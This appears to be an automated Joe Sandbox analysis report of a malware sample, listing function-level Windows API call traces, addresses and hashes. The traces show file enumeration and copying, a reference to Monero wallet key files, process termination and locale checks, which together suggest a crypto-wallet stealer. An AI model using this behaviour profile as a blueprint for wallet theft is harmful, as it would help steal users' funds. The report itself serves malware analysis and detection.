                                    • Instruction Fuzzy Hash: EDB13675A00218ABCB64FF60DD56FEE7379AF65300F4085A8E50A97151EF306B49CBA2
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B523C,?,?,?,001B52E4,?,?,00000000,?,00000000), ref: 00191963
                                    • StrCmpCA.SHLWAPI(?,001B538C), ref: 001919B3
                                    • StrCmpCA.SHLWAPI(?,001B5434), ref: 001919C9
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00191D80
                                    • DeleteFileA.KERNEL32(00000000), ref: 00191E0A
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00191E60
                                    • FindClose.KERNEL32(000000FF), ref: 00191E72
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 1415058207-1173974218
                                    • Opcode ID: 6752805cdf53713d06ee1d8bd5791d008ef8c1fa9281dc72225e9dac3567e493
                                    • Instruction ID: 943df10ed4e22b14c1a73bf1fe680935cf7a3726d0f01568fec7785f588b68d8
                                    • Opcode Fuzzy Hash: 6752805cdf53713d06ee1d8bd5791d008ef8c1fa9281dc72225e9dac3567e493
                                    • Instruction Fuzzy Hash: F7120375950219ABCF59FB60CCA6EEE7379AF65300F8045D9B10A62091EF706F88CF61
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,001B0C32), ref: 0019DF5E
                                    • StrCmpCA.SHLWAPI(?,001B15C0), ref: 0019DFAE
                                    • StrCmpCA.SHLWAPI(?,001B15C4), ref: 0019DFC4
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019E4E0
                                    • FindClose.KERNEL32(000000FF), ref: 0019E4F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2325840235-1173974218
                                    • Opcode ID: 3aed0ae6518ee77866bc4099f53b7493053a1c734aa5ec1325185dd9e4d9c61f
                                    • Instruction ID: 4e91ff39d8aff9e2cf6367581100659a0560cb401b96dd67fd0c1603ff9075d0
                                    • Opcode Fuzzy Hash: 3aed0ae6518ee77866bc4099f53b7493053a1c734aa5ec1325185dd9e4d9c61f
                                    • Instruction Fuzzy Hash: 90F1CE75954118ABCB65EB60CDA5EEE7379BF65300FC045D9B00A62091EF306F89CF62
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001B15A8,001B0BAF), ref: 0019DBEB
                                    • StrCmpCA.SHLWAPI(?,001B15AC), ref: 0019DC33
                                    • StrCmpCA.SHLWAPI(?,001B15B0), ref: 0019DC49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019DECC
                                    • FindClose.KERNEL32(000000FF), ref: 0019DEDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 468969c0984d469b535331ae994859dae02ba153de60ba337ccf1677ca7b0fc6
                                    • Instruction ID: 3d34e108de7ed2ea7f1ad924e7edfe4d0c944c116290356057d36aa57c9ca6e3
                                    • Opcode Fuzzy Hash: 468969c0984d469b535331ae994859dae02ba153de60ba337ccf1677ca7b0fc6
                                    • Instruction Fuzzy Hash: 6C912676A002049BCF54FB74ED569ED737DAFA5300F4085A8F90656181FF74AB48CBA2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #zOe$$@w>$&h}l$6AF$QY{$Zq$cE~_$r|k$t4|M
                                    • API String ID: 0-291898898
                                    • Opcode ID: 29304acf796993b52b802666623e01e036baf1bae706f6eb48af91f4367e6cb7
                                    • Instruction ID: f13bc3dee1ef0bc82dd8b739e5cb42d16f4e5d86e21db19bf7380a0a37840c6a
                                    • Opcode Fuzzy Hash: 29304acf796993b52b802666623e01e036baf1bae706f6eb48af91f4367e6cb7
                                    • Instruction Fuzzy Hash: 79B219F3A0C2009FE7046E2DEC8567ABBEAEFD4720F1A853DE6C4C7744E53598058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %8{=$27g$90oK$OY{$T;~6$TZ?_$j<7$q/n*$s5E
                                    • API String ID: 0-2070337930
                                    • Opcode ID: fa9656eb1dc0bf2beb1c2b33ae366483029cc433523b8d250e028aa6901040a8
                                    • Instruction ID: 766687a789d1e51ad91a4eb54a27c4840a2aff97e0921c5fc30c209c57cb308c
                                    • Opcode Fuzzy Hash: fa9656eb1dc0bf2beb1c2b33ae366483029cc433523b8d250e028aa6901040a8
                                    • Instruction Fuzzy Hash: 8DB216F360C2049FE304AE2DEC8567AFBE9EF94720F1A493DE6C5C7740EA3558058696
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001A9905
                                    • Process32First.KERNEL32(00199FDE,00000128), ref: 001A9919
                                    • Process32Next.KERNEL32(00199FDE,00000128), ref: 001A992E
                                    • StrCmpCA.SHLWAPI(?,00199FDE), ref: 001A9943
                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 001A995C
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 001A997A
                                    • CloseHandle.KERNEL32(00000000), ref: 001A9987
                                    • CloseHandle.KERNEL32(00199FDE), ref: 001A9993
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                    • String ID:
                                    • API String ID: 2696918072-0
                                    • Opcode ID: 4b8671da3da20742166793f0e1f44ea1b652e56c7672b27dbb9320e7fa7954c5
                                    • Instruction ID: bdd02fd9a610e0cdbbda8e2f931254d837df36de453d1af73ed1d6e0335fea79
                                    • Opcode Fuzzy Hash: 4b8671da3da20742166793f0e1f44ea1b652e56c7672b27dbb9320e7fa7954c5
                                    • Instruction Fuzzy Hash: 51112E75A14218EBDB24DFA0DC48BDEB7B8BB49708F0085DCF509A6240EB749B84CF95
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,001B05B7), ref: 001A7D71
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 001A7D89
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 001A7D9D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 001A7DF2
                                    • LocalFree.KERNEL32(00000000), ref: 001A7EB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: e8c954e53e5d61e298191b410ab4b266de6785ce1f91e98683aaebc618a0c4c0
                                    • Instruction ID: 1baf674be46287d434e05322ca4a5753ac0c422aa7d5929b0076fc4d4e1e63a3
                                    • Opcode Fuzzy Hash: e8c954e53e5d61e298191b410ab4b266de6785ce1f91e98683aaebc618a0c4c0
                                    • Instruction Fuzzy Hash: D3417C75940218ABDB24DFA4DC99BEEB378FF59700F6041D9E00A62280DB742F84CFA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .+'$L#w$O)v$QB{o$~R@$~ne]$!wv
                                    • API String ID: 0-46411695
                                    • Opcode ID: 8610d914c8711e35527b6abf8c33266b12bcf931127ebdd18ae2da91cd8daa19
                                    • Instruction ID: 9ccb18be5da5fcca46f98c5ee50d4bcab43769de047e5f16c3ad593d01bd68bf
                                    • Opcode Fuzzy Hash: 8610d914c8711e35527b6abf8c33266b12bcf931127ebdd18ae2da91cd8daa19
                                    • Instruction Fuzzy Hash: 80B23AF3A0C2006FE704AE2DEC8567ABBE5EFD4320F1A453DEAC5C7744E93598058696
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,001B0D79), ref: 0019E5A2
                                    • StrCmpCA.SHLWAPI(?,001B15F0), ref: 0019E5F2
                                    • StrCmpCA.SHLWAPI(?,001B15F4), ref: 0019E608
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0019ECDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: a5f4d69bea1d96b54b9b8d19f70338ed3468ab888f19c32a2daebbc36415b522
                                    • Instruction ID: fba9b6da49a398334de1d6d993fc91559e80bb12a5f0c0527c4451a5ccf271a9
                                    • Opcode Fuzzy Hash: a5f4d69bea1d96b54b9b8d19f70338ed3468ab888f19c32a2daebbc36415b522
                                    • Instruction Fuzzy Hash: 61123176A10218ABDB54FB70DDA6EED7379AF65300F8045E9B50A52091EF306F48CF62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: '.=3$A[J$t^^!$x+[y$4g$C_
                                    • API String ID: 0-1315223046
                                    • Opcode ID: 9589312d4797113ed4907397dcd95034276c54a006eea23f960f792cc70d3905
                                    • Instruction ID: a4a230a8c968ee199e4ea17a72ec2f75c87e2401e17211c010b75fad965756b2
                                    • Opcode Fuzzy Hash: 9589312d4797113ed4907397dcd95034276c54a006eea23f960f792cc70d3905
                                    • Instruction Fuzzy Hash: BDB248F3A082049FD7046E2DEC4567ABBEAEFD4320F1A453DEAC5C7744EA3558058693
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 5:U$Qm>$W<-K$l2z>$q#_?$qf7_
                                    • API String ID: 0-4233599896
                                    • Opcode ID: 9047c6dade3c9be2aef3928e39706a024e4f3a07510e79471b1a9d8fe5f5ab72
                                    • Instruction ID: d4c498535db874dbca7ddb7b57d8852a7a55f92dc9d6a72bf2c84da0dc366eee
                                    • Opcode Fuzzy Hash: 9047c6dade3c9be2aef3928e39706a024e4f3a07510e79471b1a9d8fe5f5ab72
                                    • Instruction Fuzzy Hash: 97B239F360C2049FE304AE2DEC8567ABBE5EFD4720F1A853DE6C4C3744E63599058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: $)~_$qv}$r}$8}?$Jbo
                                    • API String ID: 0-2750375006
                                    • Opcode ID: 6c30c74771bd3310fe3249cb954c3cd948a0bc3166f8c496da31d678e1ddf07e
